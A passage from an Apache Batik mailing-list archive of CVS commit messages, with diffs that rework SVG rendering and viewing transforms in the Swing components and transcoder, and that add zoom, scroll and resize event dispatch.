distribution in * * the LICENSE file. * *****************************************************************************/ package org.apache.batik.dom.svg; import java.awt.geom.AffineTransform; import java.awt.geom.NoninvertibleTransformException; import org.w3c.dom.DOMException; import org.w3c.dom.svg.SVGMatrix; import org.w3c.dom.svg.SVGPoint; /** * This class provides an abstract implementation of the {@link SVGMatrix} * interface. * * @author <a href="mailto:[email protected]">Stephane Hillion</a> * @version $Id: SVGOMPoint.java,v 1.1 2003/02/24 18:25:53 deweese Exp $ */ public class SVGOMPoint implements SVGPoint { float x, y; public SVGOMPoint() { x=0; y=0; } public SVGOMPoint(float x, float y) { this.x = x; this.y = y; } public float getX( ) { return x; } public void setX( float x ) throws DOMException { this.x = x; } public float getY( ) { return y; } public void setY( float y ) throws DOMException { this.y = y; } public SVGPoint matrixTransform ( SVGMatrix matrix ) { float newX = matrix.getA()*x + matrix.getC()*y + matrix.getE(); float newY = matrix.getB()*x + matrix.getD()*y + matrix.getF(); return new SVGOMPoint(newX, newY); } } 1.3 +18 -181 xml-batik/sources/org/apache/batik/dom/svg/SVGOMRect.java 1.45 +1 -6 xml-batik/sources/org/apache/batik/gvt/AbstractGraphicsNode.java Index: AbstractGraphicsNode.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/gvt/AbstractGraphicsNode.java,v retrieving revision 1.44 retrieving revision 1.45 diff -u -r1.44 -r1.45 --- AbstractGraphicsNode.java 25 Jul 2002 21:42:42 -0000 1.44 +++ AbstractGraphicsNode.java 24 Feb 2003 18:25:53 -0000 1.45 @@ -37,13 +37,8 @@ import org.apache.batik.ext.awt.image.PadMode; import org.apache.batik.ext.awt.image.renderable.ClipRable; import org.apache.batik.ext.awt.image.renderable.Filter; -import org.apache.batik.gvt.event.GraphicsNodeEvent; import org.apache.batik.gvt.event.GraphicsNodeChangeEvent; import org.apache.batik.gvt.event.GraphicsNodeChangeListener; -import org.apache.batik.gvt.event.GraphicsNodeKeyEvent; -import org.apache.batik.gvt.event.GraphicsNodeKeyListener; -import org.apache.batik.gvt.event.GraphicsNodeMouseEvent; -import org.apache.batik.gvt.event.GraphicsNodeMouseListener; import org.apache.batik.gvt.filter.Mask; import org.apache.batik.gvt.filter.GraphicsNodeRable; import org.apache.batik.gvt.filter.GraphicsNodeRable8Bit; 1.6 +83 -1 xml-batik/sources/org/apache/batik/gvt/CanvasGraphicsNode.java Index: CanvasGraphicsNode.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/gvt/CanvasGraphicsNode.java,v retrieving revision 1.5 retrieving revision 1.6 diff -u -r1.5 -r1.6 --- CanvasGraphicsNode.java 18 Sep 2001 21:18:59 -0000 1.5 +++ CanvasGraphicsNode.java 24 Feb 2003 18:25:53 -0000 1.6 @@ -12,6 +12,8 @@ import java.awt.Rectangle; import java.awt.Graphics2D; import java.awt.geom.Dimension2D; +import java.awt.geom.AffineTransform; +import java.awt.geom.NoninvertibleTransformException; /** * The graphics node container with a background color. @@ -21,6 +23,21 @@ */ public class CanvasGraphicsNode extends CompositeGraphicsNode { + /** + * This is the position transform for this graphics node. + * This is needed because getCTM returns the transform + * to the viewport coordinate system which is after viewing but + * before positioning. + */ + protected AffineTransform positionTransform; + /** + * This is the viewing transform for this graphics node. + * This is needed because getCTM returns the transform + * to the viewport coordinate system which is after viewing but + * before positioning. + */ + protected AffineTransform viewingTransform; + /** * The background of this canvas graphics node. */ @@ -51,6 +68,71 @@ return backgroundPaint; } + public void setPositionTransform(AffineTransform at) { + fireGraphicsNodeChangeStarted(); + invalidateGeometryCache(); + this.positionTransform = at; + if (positionTransform != null) { + transform = new AffineTransform(positionTransform); + if (viewingTransform != null) + transform.concatenate(viewingTransform); + } else if (viewingTransform != null) + transform = new AffineTransform(viewingTransform); + else + transform = new AffineTransform(); + + if (transform.getDeterminant() != 0){ + try{ + inverseTransform = transform.createInverse(); + }catch(NoninvertibleTransformException e){ + // Should never happen. + throw new Error(); + } + } + else{ + // The transform is not invertible. Use the same + // transform. + inverseTransform = transform; + } + fireGraphicsNodeChangeCompleted(); + } + + public AffineTransform getPositionTransform() { + return positionTransform; + } + + public void setViewingTransform(AffineTransform at) { + fireGraphicsNodeChangeStarted(); + invalidateGeometryCache(); + this.viewingTransform = at; + if (positionTransform != null) { + transform = new AffineTransform(positionTransform); + if (viewingTransform != null) + transform.concatenate(viewingTransform); + } else if (viewingTransform != null) + transform = new AffineTransform(viewingTransform); + else + transform = new AffineTransform(); + + if(transform.getDeterminant() != 0){ + try{ + inverseTransform = transform.createInverse(); + }catch(NoninvertibleTransformException e){ + // Should never happen. + throw new Error(); + } + } + else{ + // The transform is not invertible. Use the same + // transform. + inverseTransform = transform; + } + fireGraphicsNodeChangeCompleted(); + } + + public AffineTransform getViewingTransform() { + return viewingTransform; + } // // Drawing methods // 1.11 +4 -3 xml-batik/sources/org/apache/batik/gvt/event/AWTEventDispatcher.java Index: AWTEventDispatcher.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/gvt/event/AWTEventDispatcher.java,v retrieving revision 1.10 retrieving revision 1.11 diff -u -r1.10 -r1.11 --- AWTEventDispatcher.java 28 Jun 2002 15:02:02 -0000 1.10 +++ AWTEventDispatcher.java 24 Feb 2003 18:25:53 -0000 1.11 @@ -338,11 +338,12 @@ protected void dispatchMouseEvent(MouseEvent evt) { GraphicsNodeMouseEvent gvtevt; Point2D p = new Point2D.Float(evt.getX(), evt.getY()); + Point2D gnp = p; if (baseTransform != null) { - p = baseTransform.transform(p, null); + gnp = baseTransform.transform(p, null); } - GraphicsNode node = root.nodeHitAt(p); + GraphicsNode node = root.nodeHitAt(gnp); // If the receiving node has changed, send a notification // check if we enter a new node 1.36 +2 -2 xml-batik/sources/org/apache/batik/swing/JSVGCanvas.java Index: JSVGCanvas.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/swing/JSVGCanvas.java,v retrieving revision 1.35 retrieving revision 1.36 diff -u -r1.35 -r1.36 --- JSVGCanvas.java 11 Nov 2002 14:38:37 -0000 1.35 +++ JSVGCanvas.java 24 Feb 2003 18:25:54 -0000 1.36 @@ -517,7 +517,7 @@ */ protected class ResetTransformAction extends AbstractAction { public void actionPerformed(ActionEvent evt) { - setFragmentIdentifier(null); + fragmentIdentifier = null; resetRenderingTransform(); } } 1.30 +25 -10 xml-batik/sources/org/apache/batik/swing/gvt/JGVTComponent.java Index: JGVTComponent.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/swing/gvt/JGVTComponent.java,v retrieving revision 1.29 retrieving revision 1.30 diff -u -r1.29 -r1.30 --- JGVTComponent.java 2 Aug 2002 00:18:35 -0000 1.29 +++ JGVTComponent.java 24 Feb 2003 18:25:54 -0000 1.30 @@ -113,12 +113,12 @@ /** * The initial rendering transform. */ - protected AffineTransform initialTransform; + protected AffineTransform initialTransform = new AffineTransform(); /** * The transform used for rendering. */ - protected AffineTransform renderingTransform; + protected AffineTransform renderingTransform = new AffineTransform(); /** * The transform used for painting. @@ -206,8 +206,8 @@ addComponentListener(new ComponentAdapter() { public void componentResized(ComponentEvent e) { - updateRenderingTransform(); - scheduleGVTRendering(); + if (updateRenderingTransform()) + scheduleGVTRendering(); } }); @@ -264,6 +264,9 @@ */ public void setGraphicsNode(GraphicsNode gn) { setGraphicsNode(gn, true); + initialTransform = new AffineTransform(); + updateRenderingTransform(); + setRenderingTransform(initialTransform, true); } /** @@ -277,7 +280,6 @@ if (eventDispatcher != null) { eventDispatcher.setRootNode(gn); } - computeRenderingTransform(); } /** @@ -483,6 +485,11 @@ * Calling this method causes a rendering to be performed. */ public void setRenderingTransform(AffineTransform at) { + setRenderingTransform(at, true); + } + + public void setRenderingTransform(AffineTransform at, + boolean performRedraw) { renderingTransform = at; suspendInteractions = true; if (eventDispatcher != null) { @@ -493,7 +500,8 @@ handleException(e); } } - scheduleGVTRendering(); + if (performRedraw) + scheduleGVTRendering(); } /** @@ -611,17 +619,24 @@ /** * Computes the initial value of the transform used for rendering. + * Return true if a repaint is required, otherwise false. */ - protected void computeRenderingTransform() { + protected boolean computeRenderingTransform() { initialTransform = new AffineTransform(); - setRenderingTransform(initialTransform); + if (initialTransform != renderingTransform) { + setRenderingTransform(initialTransform, false); + return true; + } + return false; } /** * Updates the value of the transform used for rendering. + * Return true if a repaint is required, otherwise false. */ - protected void updateRenderingTransform() { + protected boolean updateRenderingTransform() { // Do nothing. + return false; } /** 1.62 +128 -23 xml-batik/sources/org/apache/batik/swing/svg/JSVGComponent.java Index: JSVGComponent.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/swing/svg/JSVGComponent.java,v retrieving revision 1.61 retrieving revision 1.62 diff -u -r1.61 -r1.62 --- JSVGComponent.java 14 Nov 2002 19:44:49 -0000 1.61 +++ JSVGComponent.java 24 Feb 2003 18:25:54 -0000 1.62 @@ -8,6 +8,7 @@ package org.apache.batik.swing.svg; +import java.awt.Container; import java.awt.Cursor; import java.awt.Dimension; import java.awt.EventQueue; @@ -15,6 +16,7 @@ import java.awt.Point; import java.awt.Rectangle; import java.awt.Shape; +import java.awt.Window; import java.awt.event.KeyEvent; import java.awt.event.MouseEvent; @@ -58,6 +60,8 @@ import org.apache.batik.ext.awt.image.spi.ImageTagRegistry; import org.apache.batik.gvt.GraphicsNode; +import org.apache.batik.gvt.CanvasGraphicsNode; +import org.apache.batik.gvt.CompositeGraphicsNode; import org.apache.batik.gvt.event.EventDispatcher; @@ -538,7 +542,8 @@ */ public void setFragmentIdentifier(String fi) { fragmentIdentifier = fi; - computeRenderingTransform(); + if (computeRenderingTransform()) + scheduleGVTRendering(); } /** @@ -593,33 +598,81 @@ } } + public CanvasGraphicsNode getCanvasGraphicsNode() { + return getCanvasGraphicsNode(gvtRoot); + + } + + protected CanvasGraphicsNode getCanvasGraphicsNode(GraphicsNode gn) { + if (!(gn instanceof CompositeGraphicsNode)) + return null; + CompositeGraphicsNode cgn = (CompositeGraphicsNode)gn; + gn = (GraphicsNode)cgn.getChildren().get(0); + if (!(gn instanceof CanvasGraphicsNode)) + return null; + return (CanvasGraphicsNode)gn; + } + /** * Computes the transform used for rendering. + * Returns true if the component needs to be repainted. */ - protected void computeRenderingTransform() { + protected boolean computeRenderingTransform() { + if ((svgDocument == null) || (gvtRoot == null)) + return false; + + boolean ret = false; try { - if (svgDocument != null) { - SVGSVGElement elt = svgDocument.getRootElement(); - Dimension d = getSize(); - if (d.width < 1) d.width = 1; - if (d.height < 1) d.height = 1; - setRenderingTransform - (ViewBox.getViewTransform - (fragmentIdentifier, elt, d.width, d.height)); - initialTransform = renderingTransform; + SVGSVGElement elt = svgDocument.getRootElement(); + Dimension d = getSize(); + if (d.width < 1) d.width = 1; + if (d.height < 1) d.height = 1; + AffineTransform at = ViewBox.getViewTransform + (fragmentIdentifier, elt, d.width, d.height); + CanvasGraphicsNode cgn = getCanvasGraphicsNode(); + if (!at.equals(cgn.getViewingTransform())) { + cgn.setViewingTransform(at); + if (renderer != null) + renderer.setTree(gvtRoot); + ret = true; + } + + initialTransform = new AffineTransform(); + if (!initialTransform.equals(getRenderingTransform())) { + setRenderingTransform(initialTransform, false); + ret = true; } } catch (BridgeException e) { userAgent.displayError(e); } + return ret; } /** * Updates the value of the transform used for rendering. + * Return true if a repaint is required, otherwise false. */ - protected void updateRenderingTransform() { - if (initialTransform == renderingTransform) { - computeRenderingTransform(); + protected boolean updateRenderingTransform() { + if ((svgDocument == null) || (gvtRoot == null)) + return false; + try { + SVGSVGElement elt = svgDocument.getRootElement(); + Dimension d = getSize(); + if (d.width < 1) d.width = 1; + if (d.height < 1) d.height = 1; + AffineTransform at = ViewBox.getViewTransform + (fragmentIdentifier, elt, d.width, d.height); + CanvasGraphicsNode cgn = getCanvasGraphicsNode(); + if (!at.equals(cgn.getViewingTransform())) { + cgn.setViewingTransform(at); + if (renderer != null) + renderer.setTree(gvtRoot); + return true; + } + } catch (BridgeException e) { + userAgent.displayError(e); } + return false; } /** @@ -866,7 +919,6 @@ * The data of the event is initialized to the old document. */ public void gvtBuildStarted(GVTTreeBuilderEvent e) { - computeRenderingTransform(); } /** @@ -885,16 +937,39 @@ return; } + Dimension2D dim = bridgeContext.getDocumentSize(); + setMySize(new Dimension((int)dim.getWidth(), + (int)dim.getHeight())); + SVGSVGElement elt = svgDocument.getRootElement(); + Dimension sz = getSize(); + if (sz.width < 1) sz.width = 1; + if (sz.height < 1) sz.height = 1; + AffineTransform vt = ViewBox.getViewTransform + (fragmentIdentifier, elt, sz.width, sz.height); + CanvasGraphicsNode cgn = getCanvasGraphicsNode(e.getGVTRoot()); + cgn.setViewingTransform(vt); + gvtRoot = null; if (isDynamicDocument && JSVGComponent.this.eventsEnabled) { startSVGLoadEventDispatcher(e.getGVTRoot()); } else { JSVGComponent.this.setGraphicsNode(e.getGVTRoot(), false); + scheduleGVTRendering(); } - Dimension2D dim = bridgeContext.getDocumentSize(); - setPreferredSize(new Dimension((int)dim.getWidth(), - (int)dim.getHeight())); + } + + public void setMySize(Dimension d) { + setPreferredSize(d); invalidate(); + Container p = getParent(); + while (p != null) { + if (p instanceof Window) { + Window w = (Window) p; + w.pack(); + break; + } + p = p.getParent(); + } } /** @@ -938,10 +1013,10 @@ JSVGComponent.this.image = null; repaint(); } else { + setMySize(new Dimension((int)dim.getWidth(), + (int)dim.getHeight())); JSVGComponent.this.setGraphicsNode(gn, false); - setPreferredSize(new Dimension((int)dim.getWidth(), - (int)dim.getHeight())); - invalidate(); + computeRenderingTransform(); } userAgent.displayError(((GVTTreeBuilder)e.getSource()) .getException()); @@ -980,6 +1055,7 @@ } JSVGComponent.this.setGraphicsNode(e.getGVTRoot(), false); + scheduleGVTRendering(); } /** @@ -1030,6 +1106,7 @@ repaint(); } else { JSVGComponent.this.setGraphicsNode(gn, false); + computeRenderingTransform(); } userAgent.displayError(((SVGLoadEventDispatcher)e.getSource()) .getException()); @@ -1945,6 +2022,25 @@ } /** + * Sets the <code>AffineTransform</code> to be + * applied to the drawing by the UserAgent. + */ + public void setTransform(AffineTransform at) { + if (EventQueue.isDispatchThread()) { + userAgent.setTransform(at); + } else { + final AffineTransform affine = at; + class Query implements Runnable { + public void run() { + userAgent.setTransform(affine); + } + } + Query q = new Query(); + invokeAndWait(q); + } + } + + /** * Returns this user agent's CSS media. */ public String getMedia() { @@ -2497,7 +2593,8 @@ ((s == null) || (!s.equals(fragmentIdentifier)))) { // It is, so update rendering transform. fragmentIdentifier = s; - computeRenderingTransform(); + if (computeRenderingTransform()) + scheduleGVTRendering(); } // Let every one know the link fired (but don't // load doc, it's already loaded.). @@ -2567,6 +2664,14 @@ */ public AffineTransform getTransform() { return JSVGComponent.this.renderingTransform; + } + + /** + * Sets the <code>AffineTransform</code> to be + * applied to the drawing by the UserAgent. + */ + public void setTransform(AffineTransform at) { + JSVGComponent.this.setRenderingTransform(at); } /** 1.4 +55 -10 xml-batik/sources/org/apache/batik/transcoder/SVGAbstractTranscoder.java Index: SVGAbstractTranscoder.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/transcoder/SVGAbstractTranscoder.java,v retrieving revision 1.3 retrieving revision 1.4 diff -u -r1.3 -r1.4 --- SVGAbstractTranscoder.java 18 Sep 2002 09:23:12 -0000 1.3 +++ SVGAbstractTranscoder.java 24 Feb 2003 18:25:54 -0000 1.4 @@ -22,6 +22,8 @@ import org.apache.batik.dom.util.DocumentFactory; import org.apache.batik.gvt.GraphicsNode; +import org.apache.batik.gvt.CanvasGraphicsNode; +import org.apache.batik.gvt.CompositeGraphicsNode; import org.apache.batik.bridge.BaseScriptingEnvironment; import org.apache.batik.bridge.BridgeContext; @@ -165,19 +167,12 @@ GraphicsNode gvtRoot; try { gvtRoot = builder.build(ctx, svgDoc); - // dispatch an 'onload' event if needed - if (ctx.isDynamic()) { - BaseScriptingEnvironment se = new BaseScriptingEnvironment(ctx); - se.loadScripts(); - se.dispatchSVGLoadEvent(); - } } catch (BridgeException ex) { throw new TranscoderException(ex); } // get the 'width' and 'height' attributes of the SVG document float docWidth = (float)ctx.getDocumentSize().getWidth(); float docHeight = (float)ctx.getDocumentSize().getHeight(); - ctx = null; builder = null; setImageSize(docWidth, docHeight); @@ -188,6 +183,7 @@ try { Px = ViewBox.getViewTransform(ref, root, width, height); + } catch (BridgeException ex) { throw new TranscoderException(ex); } @@ -219,10 +215,42 @@ } else { curAOI = new Rectangle2D.Float(0, 0, width, height); } - curTxf = Px; + + CanvasGraphicsNode cgn = getCanvasGraphicsNode(gvtRoot); + if (cgn != null) { + cgn.setViewingTransform(Px); + curTxf = new AffineTransform(); + } else { + curTxf = Px; + } + + try { + // dispatch an 'onload' event if needed + if (ctx.isDynamic()) { + BaseScriptingEnvironment se; + se = new BaseScriptingEnvironment(ctx); + se.loadScripts(); + se.dispatchSVGLoadEvent(); + } + } catch (BridgeException ex) { + throw new TranscoderException(ex); + } + ctx = null; + + this.root = gvtRoot; } + protected CanvasGraphicsNode getCanvasGraphicsNode(GraphicsNode gn) { + if (!(gn instanceof CompositeGraphicsNode)) + return null; + CompositeGraphicsNode cgn = (CompositeGraphicsNode)gn; + gn = (GraphicsNode)cgn.getChildren().get(0); + if (!(gn instanceof CanvasGraphicsNode)) + return null; + return (CanvasGraphicsNode)gn; + } + /** * Sets document size according to the hints. * Global variables width and height are modified. @@ -678,10 +706,26 @@ } /** + * Return the rendering transform. + */ + public AffineTransform getTransform() { + return SVGAbstractTranscoder.this.curTxf; + } + + /** + * Return the rendering transform. + */ + public void setTransform(AffineTransform at) { + SVGAbstractTranscoder.this.curTxf = at; + } + + /** * Returns the default size of this user agent (400x400). */ public Dimension2D getViewportSize() { - return new Dimension(400, 400); + return new Dimension + ((int)SVGAbstractTranscoder.this.width, + (int)SVGAbstractTranscoder.this.height); } /** @@ -701,6 +745,7 @@ */ public void displayError(Exception e) { try { + e.printStackTrace(); SVGAbstractTranscoder.this.handler.error (new TranscoderException(e)); } catch (TranscoderException ex) { 1.91 +24 -23 xml-batik/test-resources/org/apache/batik/test/samplesRendering.xml Index: samplesRendering.xml =================================================================== RCS file: /home/cvs/xml-batik/test-resources/org/apache/batik/test/samplesRendering.xml,v retrieving revision 1.90 retrieving revision 1.91 diff -u -r1.90 -r1.91 --- samplesRendering.xml 8 Feb 2003 13:25:12 -0000 1.90 +++ samplesRendering.xml 24 Feb 2003 18:25:54 -0000 1.91 @@ -303,9 +303,22 @@ <testGroup id="tests.spec.scripting"> <test id="samples/tests/spec/scripting/add.svg" /> + <test id="samples/tests/spec/scripting/bug12933.svg" /> <test id="samples/tests/spec/scripting/circle.svg" /> + <test id="samples/tests/spec/scripting/currentScaleTranslate.svg" /> <test id="samples/tests/spec/scripting/ellipse.svg" /> + <test id="samples/tests/spec/scripting/fill.svg" /> + <test id="samples/tests/spec/scripting/filterPatternUpdate.svg" /> + <test id="samples/tests/spec/scripting/gradientsUpdate.svg" /> + <test id="samples/tests/spec/scripting/image.svg" /> + <test id="samples/tests/spec/scripting/imageRefUpdate.svg" /> + <test id="samples/tests/spec/scripting/imageUpdate.svg" /> + <test id="samples/tests/spec/scripting/imageraster.svg" /> + <test id="samples/tests/spec/scripting/imagesvg.svg" /> <test id="samples/tests/spec/scripting/line.svg" /> + <test id="samples/tests/spec/scripting/markerUpdate.svg" /> + <test id="samples/tests/spec/scripting/maskClipUpdate.svg" /> + <test id="samples/tests/spec/scripting/nestedsvg.svg" /> <test id="samples/tests/spec/scripting/path.svg" /> <test id="samples/tests/spec/scripting/polygon.svg" /> <test id="samples/tests/spec/scripting/polyline.svg" /> @@ -313,35 +326,23 @@ <test id="samples/tests/spec/scripting/remove.svg" /> <test id="samples/tests/spec/scripting/removeLast.svg" /> <test id="samples/tests/spec/scripting/removeOnclick.svg" /> - <test id="samples/tests/spec/scripting/transform.svg" /> - <test id="samples/tests/spec/scripting/transform2.svg" /> - <test id="samples/tests/spec/scripting/xyModifOnLoad.svg" /> - <test id="samples/tests/spec/scripting/fill.svg" /> - <test id="samples/tests/spec/scripting/visibility.svg" /> - <test id="samples/tests/spec/scripting/textProperties.svg" /> - <test id="samples/tests/spec/scripting/nestedsvg.svg" /> + <test id="samples/tests/spec/scripting/svg.svg" /> + <test id="samples/tests/spec/scripting/svg2.svg" /> <test id="samples/tests/spec/scripting/text.svg" /> <test id="samples/tests/spec/scripting/textAllProperties.svg" /> - <test id="samples/tests/spec/scripting/textpathProperties.svg" /> - <test id="samples/tests/spec/scripting/trefProperties.svg" /> - <test id="samples/tests/spec/scripting/tspan.svg" /> + <test id="samples/tests/spec/scripting/textProperties.svg" /> <test id="samples/tests/spec/scripting/text_children1.svg" /> <test id="samples/tests/spec/scripting/text_children2.svg" /> <test id="samples/tests/spec/scripting/text_children3.svg" /> + <test id="samples/tests/spec/scripting/textpathProperties.svg" /> + <test id="samples/tests/spec/scripting/transform.svg" /> + <test id="samples/tests/spec/scripting/transform2.svg" /> + <test id="samples/tests/spec/scripting/trefProperties.svg" /> + <test id="samples/tests/spec/scripting/tspan.svg" /> <test id="samples/tests/spec/scripting/tspanProperties.svg" /> - <test id="samples/tests/spec/scripting/image.svg" /> - <test id="samples/tests/spec/scripting/imageraster.svg" /> - <test id="samples/tests/spec/scripting/imagesvg.svg" /> - <test id="samples/tests/spec/scripting/imageRefUpdate.svg" /> - <test id="samples/tests/spec/scripting/imageUpdate.svg" /> - <test id="samples/tests/spec/scripting/gradientsUpdate.svg" /> - <test id="samples/tests/spec/scripting/maskClipUpdate.svg" /> - <test id="samples/tests/spec/scripting/markerUpdate.svg" /> - <test id="samples/tests/spec/scripting/filterPatternUpdate.svg" /> <test id="samples/tests/spec/scripting/use.svg" /> - <test id="samples/tests/spec/scripting/svg.svg" /> - <test id="samples/tests/spec/scripting/svg2.svg" /> - <test id="samples/tests/spec/scripting/bug12933.svg" /> + <test id="samples/tests/spec/scripting/visibility.svg" /> + <test id="samples/tests/spec/scripting/xyModifOnLoad.svg" /> </testGroup> </testSuite> --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Feb 25 10:31:01 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 57604 invoked by uid 500); 25 Feb 2003 10:30:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57592 invoked by uid 500); 25 Feb 2003 10:30:58 -0000 Delivered-To: [email protected] Date: 25 Feb 2003 10:30:57 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: xml-batik/sources/org/apache/batik/swing/svg JSVGComponent.java X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N deweese 2003/02/25 02:30:57 Modified: sources/org/apache/batik/swing/svg JSVGComponent.java Log: 1) JSVGComponent once again clears renderingTransform when loading a document. 2) Cleaned up the relationship between computRenderingTransform and updateRenderingTransform. Revision Changes Path 1.63 +14 -30 xml-batik/sources/org/apache/batik/swing/svg/JSVGComponent.java Index: JSVGComponent.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/swing/svg/JSVGComponent.java,v retrieving revision 1.62 retrieving revision 1.63 diff -u -r1.62 -r1.63 --- JSVGComponent.java 24 Feb 2003 18:25:54 -0000 1.62 +++ JSVGComponent.java 25 Feb 2003 10:30:57 -0000 1.63 @@ -621,29 +621,11 @@ if ((svgDocument == null) || (gvtRoot == null)) return false; - boolean ret = false; - try { - SVGSVGElement elt = svgDocument.getRootElement(); - Dimension d = getSize(); - if (d.width < 1) d.width = 1; - if (d.height < 1) d.height = 1; - AffineTransform at = ViewBox.getViewTransform - (fragmentIdentifier, elt, d.width, d.height); - CanvasGraphicsNode cgn = getCanvasGraphicsNode(); - if (!at.equals(cgn.getViewingTransform())) { - cgn.setViewingTransform(at); - if (renderer != null) - renderer.setTree(gvtRoot); - ret = true; - } - - initialTransform = new AffineTransform(); - if (!initialTransform.equals(getRenderingTransform())) { - setRenderingTransform(initialTransform, false); - ret = true; - } - } catch (BridgeException e) { - userAgent.displayError(e); + boolean ret = updateRenderingTransform(); + initialTransform = new AffineTransform(); + if (!initialTransform.equals(getRenderingTransform())) { + setRenderingTransform(initialTransform, false); + ret = true; } return ret; } @@ -941,13 +923,15 @@ setMySize(new Dimension((int)dim.getWidth(), (int)dim.getHeight())); SVGSVGElement elt = svgDocument.getRootElement(); - Dimension sz = getSize(); - if (sz.width < 1) sz.width = 1; - if (sz.height < 1) sz.height = 1; - AffineTransform vt = ViewBox.getViewTransform - (fragmentIdentifier, elt, sz.width, sz.height); + Dimension d = getSize(); + if (d.width < 1) d.width = 1; + if (d.height < 1) d.height = 1; + AffineTransform at = ViewBox.getViewTransform + (fragmentIdentifier, elt, d.width, d.height); CanvasGraphicsNode cgn = getCanvasGraphicsNode(e.getGVTRoot()); - cgn.setViewingTransform(vt); + cgn.setViewingTransform(at); + initialTransform = new AffineTransform(); + setRenderingTransform(initialTransform, false); gvtRoot = null; if (isDynamicDocument && JSVGComponent.this.eventsEnabled) { --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Feb 26 11:13:50 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90557 invoked by uid 500); 26 Feb 2003 11:13:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90544 invoked by uid 500); 26 Feb 2003 11:13:49 -0000 Delivered-To: [email protected] Date: 26 Feb 2003 11:13:47 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: xml-batik/sources/org/apache/batik/swing/svg JSVGComponent.java X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N deweese 2003/02/26 03:13:46 Modified: sources/org/apache/batik/bridge BaseScriptingEnvironment.java UpdateManager.java sources/org/apache/batik/swing/gvt AbstractZoomInteractor.java JGVTComponent.java sources/org/apache/batik/swing/svg JSVGComponent.java Added: sources/org/apache/batik/swing/gvt JGVTComponentAdapter.java JGVTComponentListener.java Log: 1) onzoom, onscroll, onresize events are now implemented. 2) Improved the behavior on resize, so it does a better job of keeping the content centered. Revision Changes Path 1.16 +34 -1 xml-batik/sources/org/apache/batik/bridge/BaseScriptingEnvironment.java Index: BaseScriptingEnvironment.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/bridge/BaseScriptingEnvironment.java,v retrieving revision 1.15 retrieving revision 1.16 diff -u -r1.15 -r1.16 --- BaseScriptingEnvironment.java 12 Nov 2002 09:51:34 -0000 1.15 +++ BaseScriptingEnvironment.java 26 Feb 2003 11:13:45 -0000 1.16 @@ -457,6 +457,39 @@ } /** + * Method to dispatch SVG Zoom event. + */ + protected void dispatchSVGZoomEvent() { + dispatchSVGDocEvent("SVGZoom"); + } + + /** + * Method to dispatch SVG Scroll event. + */ + protected void dispatchSVGScrollEvent() { + dispatchSVGDocEvent("SVGScroll"); + } + + /** + * Method to dispatch SVG Resize event. + */ + protected void dispatchSVGResizeEvent() { + dispatchSVGDocEvent("SVGResize"); + } + + protected void dispatchSVGDocEvent(String eventType) { + SVGSVGElement root = + (SVGSVGElement)document.getDocumentElement(); + // Event is dispatched on outermost SVG element. + EventTarget t = root; + + DocumentEvent de = (DocumentEvent)document; + Event ev = de.createEvent("SVGEvents"); + ev.initEvent(eventType, false, false); + t.dispatchEvent(ev); + } + + /** * Handles the given exception. */ protected void handleInterpreterException(InterpreterException ie) { 1.20 +25 -1 xml-batik/sources/org/apache/batik/bridge/UpdateManager.java Index: UpdateManager.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/bridge/UpdateManager.java,v retrieving revision 1.19 retrieving revision 1.20 diff -u -r1.19 -r1.20 --- UpdateManager.java 24 Feb 2003 18:25:52 -0000 1.19 +++ UpdateManager.java 26 Feb 2003 11:13:45 -0000 1.20 @@ -153,6 +153,30 @@ } /** + * Dispatches an "SVGZoom" event to the document. + */ + public void dispatchSVGZoomEvent() + throws InterruptedException { + scriptingEnvironment.dispatchSVGZoomEvent(); + } + + /** + * Dispatches an "SVGZoom" event to the document. + */ + public void dispatchSVGScrollEvent() + throws InterruptedException { + scriptingEnvironment.dispatchSVGScrollEvent(); + } + + /** + * Dispatches an "SVGZoom" event to the document. + */ + public void dispatchSVGResizeEvent() + throws InterruptedException { + scriptingEnvironment.dispatchSVGResizeEvent(); + } + + /** * Finishes the UpdateManager initialization. */ public void manageUpdates(final ImageRenderer r) { 1.3 +31 -5 xml-batik/sources/org/apache/batik/swing/gvt/AbstractZoomInteractor.java Index: AbstractZoomInteractor.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/swing/gvt/AbstractZoomInteractor.java,v retrieving revision 1.2 retrieving revision 1.3 diff -u -r1.2 -r1.3 --- AbstractZoomInteractor.java 15 Mar 2001 14:11:17 -0000 1.2 +++ AbstractZoomInteractor.java 26 Feb 2003 11:13:45 -0000 1.3 @@ -187,10 +187,36 @@ xCurrent = e.getX(); yCurrent = e.getY(); - markerTop = new Line2D.Float(xStart, yStart, xCurrent, yStart); - markerLeft = new Line2D.Float(xStart, yStart, xStart, yCurrent); - markerBottom = new Line2D.Float(xStart, yCurrent, xCurrent, yCurrent); - markerRight = new Line2D.Float(xCurrent, yCurrent, xCurrent, yStart); + // Constrain rectangle to window's Aspect 